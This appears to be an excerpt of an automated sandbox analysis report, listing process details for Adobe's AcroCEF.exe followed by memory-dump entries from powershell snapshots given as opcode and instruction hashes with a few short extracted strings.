Commandline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2096 --field-trial-handle=1760,i,5841402874270245853,5687332266173655936,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
Imagebase: 0x7ff70df30000
File size: 3'581'912 bytes
MD5 hash: 9B38E8E8B6DD9622D24B53E095C5D9BE
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: false

                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2454711995.00007FFD34070000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34070000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_7ffd34070000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: a9e08253567346b4c067f9f8539e72c0305dc86ddef7829dca75c76faf4e0bf9
                                                                • Instruction ID: 5ed6dd7555f6bafb62ba45ef5df4dadf117ee0ad80d798ad55c3d90449e69538
                                                                • Opcode Fuzzy Hash: a9e08253567346b4c067f9f8539e72c0305dc86ddef7829dca75c76faf4e0bf9
                                                                • Instruction Fuzzy Hash: 90F1F122B0EBC60FF79696285CB62B57FE1EF53210B0841BFD189C71E3D919AC05A752
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2454711995.00007FFD34070000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34070000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_7ffd34070000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 56ffa0ac028a0a6d5360166e0c544f2986609085558739bee4d03fc5729cf485
                                                                • Instruction ID: 70c2f903c0a5d2ee309e7af2f66940741486f70c546d5f5604b497814d6ca53a
                                                                • Opcode Fuzzy Hash: 56ffa0ac028a0a6d5360166e0c544f2986609085558739bee4d03fc5729cf485
                                                                • Instruction Fuzzy Hash: 8B413732B0CA894FEB95DA5C98A55BCBBD1EF85360F1C45BFC14EC71A3DA18A801D341
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2454711995.00007FFD34070000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34070000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_7ffd34070000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 77e6a84e0ecd18f51a07b4ca763e8b9a7b759aab5c556f2dfd17099de36720c1
                                                                • Instruction ID: f0b38973c2b3d52b302d09af5b1d5a01fef4f191f8415ad35abb991266b4d897
                                                                • Opcode Fuzzy Hash: 77e6a84e0ecd18f51a07b4ca763e8b9a7b759aab5c556f2dfd17099de36720c1
                                                                • Instruction Fuzzy Hash: 36213A22F0DA8A0FF3A596180CF52756AC2EF96354B4940BAD18CC71D3DD2DEC01BB42
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2454711995.00007FFD34070000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34070000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_7ffd34070000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: f87d8f7d24359f4f730f899cc19d539b66839be8e7060e4ef1fb80935be6bb7e
                                                                • Instruction ID: 830b8e909d895f5463500b978630b259bddc3e54e82ddc1e4d62036536db37cc
                                                                • Opcode Fuzzy Hash: f87d8f7d24359f4f730f899cc19d539b66839be8e7060e4ef1fb80935be6bb7e
                                                                • Instruction Fuzzy Hash: AC21FF62F0F6C65FE396A6285CB91642FE1AF5A614B0840FED089CB2D3DC1C9C099712
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2454711995.00007FFD34070000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34070000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_7ffd34070000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: aab7736e80fb4d9fc3c1ea57251bb0144c22db2d1a27f7a7cb1a78b84f0fcd4c
                                                                • Instruction ID: 57350c10b2db9bbad5d818606245d5e69ed7cf61eeec474c87a12f3339e2679d
                                                                • Opcode Fuzzy Hash: aab7736e80fb4d9fc3c1ea57251bb0144c22db2d1a27f7a7cb1a78b84f0fcd4c
                                                                • Instruction Fuzzy Hash: 9F110632F0D6854FEB55DA8848E41BC7BD1EF99360B1844BEC14ED71A3D928AC41D341
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2454711995.00007FFD34070000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34070000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_7ffd34070000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 62cd1c2bfb6a418777723e198f07d6d472eb468617f288b3eca26471f8eaf824
                                                                • Instruction ID: 0af3236131bf849175ca6423cc8e7605c87cfdaecd490daf892d096fa728a503
                                                                • Opcode Fuzzy Hash: 62cd1c2bfb6a418777723e198f07d6d472eb468617f288b3eca26471f8eaf824
                                                                • Instruction Fuzzy Hash: 3501D13130DC0A4FDF89DE0CD8A0E6037C1EBA9360F10427ED04AC7292D929EC85C780
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2454022669.00007FFD33FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD33FA0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_7ffd33fa0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: f1a5841d374860f6dbd2673d4dbdf3f20467eeebf30f8f3ffd35b473f7368df3
                                                                • Instruction ID: 8770a82d5ba48aba8429755243d8db3c1544326e304ebefd7dc8db1659d73348
                                                                • Opcode Fuzzy Hash: f1a5841d374860f6dbd2673d4dbdf3f20467eeebf30f8f3ffd35b473f7368df3
                                                                • Instruction Fuzzy Hash: 7401A73021CB0C8FD744EF0CE051AA5B3E0FB89320F10052DE58AC3651D632E882CB42
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2454711995.00007FFD34070000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34070000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_7ffd34070000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 3A_L
                                                                • API String ID: 0-4039844740
                                                                • Opcode ID: 896048a299de900bc72c47662f08075dd5eee4094d1aeeb3c1fa2e35af212d48
                                                                • Instruction ID: 2804f252dbb30df84914dff5bad822c87e542afaed35601ee9fe3994b75523c0
                                                                • Opcode Fuzzy Hash: 896048a299de900bc72c47662f08075dd5eee4094d1aeeb3c1fa2e35af212d48
                                                                • Instruction Fuzzy Hash: 84521721B0DACA4FEB56DB2C88A4A613FD1EF57310B1981FAD149CB1D3D919EC46D382
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2454022669.00007FFD33FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD33FA0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_7ffd33fa0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: ^
                                                                • API String ID: 0-1590793086
                                                                • Opcode ID: 64ede05f6b8e7a2dc45ade3ea93abfbbc7b528217438a2f837ee67b548b45559
                                                                • Instruction ID: a8341ae724a39e56ee8f65546a22b30773ab219a92312410579f307919c27c55
                                                                • Opcode Fuzzy Hash: 64ede05f6b8e7a2dc45ade3ea93abfbbc7b528217438a2f837ee67b548b45559
                                                                • Instruction Fuzzy Hash: 5DA1D757E0EBD60FE753872C58710E53F60DF53220B4A03F7C6C8AB193EA19694A96A1
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2454711995.00007FFD34070000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34070000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_7ffd34070000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 0b700039a3b715111501c1343ac5edbfa9297a7bf74dd2ed8530736e2e05df03
                                                                • Instruction ID: bc2e81473b20187b9c376cc1190886bc964504f651f7d58269a8e55c0f59de7f
                                                                • Opcode Fuzzy Hash: 0b700039a3b715111501c1343ac5edbfa9297a7bf74dd2ed8530736e2e05df03
                                                                • Instruction Fuzzy Hash: 86421932B0DB890FE795DA2C98A55B47FE1EF56210B0441BFD18DCB2D3DE29AC069742
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2454711995.00007FFD34070000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34070000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_7ffd34070000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 56414f53734e05d062dfada1088ce1428469194ceb95e6ffa4cbc7bfe5abf109
                                                                • Instruction ID: ca58258c903a0127414e82c8a87d3978a52d7c82757a5394bfa01595523820f1
                                                                • Opcode Fuzzy Hash: 56414f53734e05d062dfada1088ce1428469194ceb95e6ffa4cbc7bfe5abf109
                                                                • Instruction Fuzzy Hash: DA12E532B0DBC94FE7A69B385CA56A57FE0EF57210B0941FBD148C7193D928AC05D392
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2454022669.00007FFD33FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD33FA0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_7ffd33fa0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 7f93c009e5a80ec4ac29f79b60591ab3a8049ff4713ee794251dd3e1f95aaa51
                                                                • Instruction ID: 26429e656d305af0cf46e98e26b941cac8d398c7f4c1b41ae4a71788c373f10e
                                                                • Opcode Fuzzy Hash: 7f93c009e5a80ec4ac29f79b60591ab3a8049ff4713ee794251dd3e1f95aaa51
                                                                • Instruction Fuzzy Hash: 84B1285BB0D6D60FE792966C68F60E63BE4DF9333474903B3C68CDA093ED2858079651
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2454022669.00007FFD33FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD33FA0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_7ffd33fa0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 984654cdf641f9b0bc16dc6cb0ebfed37e9ba511f120bc1a20917d984151f4c4
                                                                • Instruction ID: 80f0134c8615f271f86df7283c9d67ddb792d53aa1628bf1f472d57d24cec3ed
                                                                • Opcode Fuzzy Hash: 984654cdf641f9b0bc16dc6cb0ebfed37e9ba511f120bc1a20917d984151f4c4
                                                                • Instruction Fuzzy Hash: 4CC1D41BB0D7D21FE352976CA8B10D93FA0EF9336574901B7C2C8CA093E929951B97E1
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2454022669.00007FFD33FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD33FA0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_7ffd33fa0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 38e914ef437c21adcbf40d26b5a14aa75eae53ecd662f690dbed09f0266bdb5c
                                                                • Instruction ID: 96927b87f685761ebea9ea11ba4e708984e923ca4642d81726ccae3c00c62286
                                                                • Opcode Fuzzy Hash: 38e914ef437c21adcbf40d26b5a14aa75eae53ecd662f690dbed09f0266bdb5c
                                                                • Instruction Fuzzy Hash: FE41B34BA0E7C29AE39342B81C758E67FB4DE9313574902F7D9C8CA093ED19084B9762
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2454022669.00007FFD33FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD33FA0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_7ffd33fa0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: M_^$M_^$M_^$M_^
                                                                • API String ID: 0-1397233021
                                                                • Opcode ID: 16fa103c09e97091ad70e31841053e1717a29440e7c2571c0cfce314e7d1f0a3
                                                                • Instruction ID: 24e99c6b7a89e4dea2bd770a8c1f3fcb833c7d76458000e12d2b5e56090c1a75
                                                                • Opcode Fuzzy Hash: 16fa103c09e97091ad70e31841053e1717a29440e7c2571c0cfce314e7d1f0a3
                                                                • Instruction Fuzzy Hash: FDC1AD71A0CB894FE399EB1C84A55B57BE0FF96311B0402BED58EC7293E925BC028B41
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2454022669.00007FFD33FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD33FA0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_7ffd33fa0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: M_^$M_^$M_^$M_^
                                                                • API String ID: 0-1397233021
                                                                • Opcode ID: a0606fb02da0a97ccfed784c8a4d573244062f9a8790daaab75e913327a33fe4
                                                                • Instruction ID: 3617e4f882c75c925fb94ead8c7636e2ff565e0580b2480bd2c006b125952137
                                                                • Opcode Fuzzy Hash: a0606fb02da0a97ccfed784c8a4d573244062f9a8790daaab75e913327a33fe4
                                                                • Instruction Fuzzy Hash: 52219253E0EAC65FE693522854BA0D93FE49F9732474E02F2C7C8DF193AD581C076611
                                                                Memory Dump Source
                                                                • Source File: 00000006.00000002.2270404954.00007FFD34080000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34080000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_6_2_7ffd34080000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 3e9297715c1477276dbc87a096ba93745b00c57908ac38a3b0df03f3b1f419c3
                                                                • Instruction ID: 4ca0ba9b0c4e7133dab7112447034b5498809cc1ccc49e211ee0cb6d26a413df
                                                                • Opcode Fuzzy Hash: 3e9297715c1477276dbc87a096ba93745b00c57908ac38a3b0df03f3b1f419c3
                                                                • Instruction Fuzzy Hash: D4311832B0CA894FEB95EB5C94A16B8BBD1EF5A220F1801BFC14DC71D3DA19A801D391
                                                                Memory Dump Source
                                                                • Source File: 00000006.00000002.2270404954.00007FFD34080000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34080000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_6_2_7ffd34080000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 8d4e19e49bf8f4a483bf5e43c4ad3f2443f71a154c1158087e628128492ac144
                                                                • Instruction ID: 0544b0cba5fed8658dbe79d553451588b4155ac0355c3a2860c41a7f4a98853c
                                                                • Opcode Fuzzy Hash: 8d4e19e49bf8f4a483bf5e43c4ad3f2443f71a154c1158087e628128492ac144
                                                                • Instruction Fuzzy Hash: D711C232B0D7894FEB95EA98C4E0578BBD1EF5A211B5400BEC64DD71D3DA29A841E340
                                                                Memory Dump Source
                                                                • Source File: 00000006.00000002.2270245063.00007FFD33FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD33FB0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_6_2_7ffd33fb0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                                • Instruction ID: 68f2ad056d85f5314422981b77dd5df7875fe41f5cb5e1dd419fd5a2c40ff67a
                                                                • Opcode Fuzzy Hash: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                                • Instruction Fuzzy Hash: 2A01A77020CB0C4FD744EF0CE051AA6B3E0FB89320F50052EE58AC3651DA32E882CB41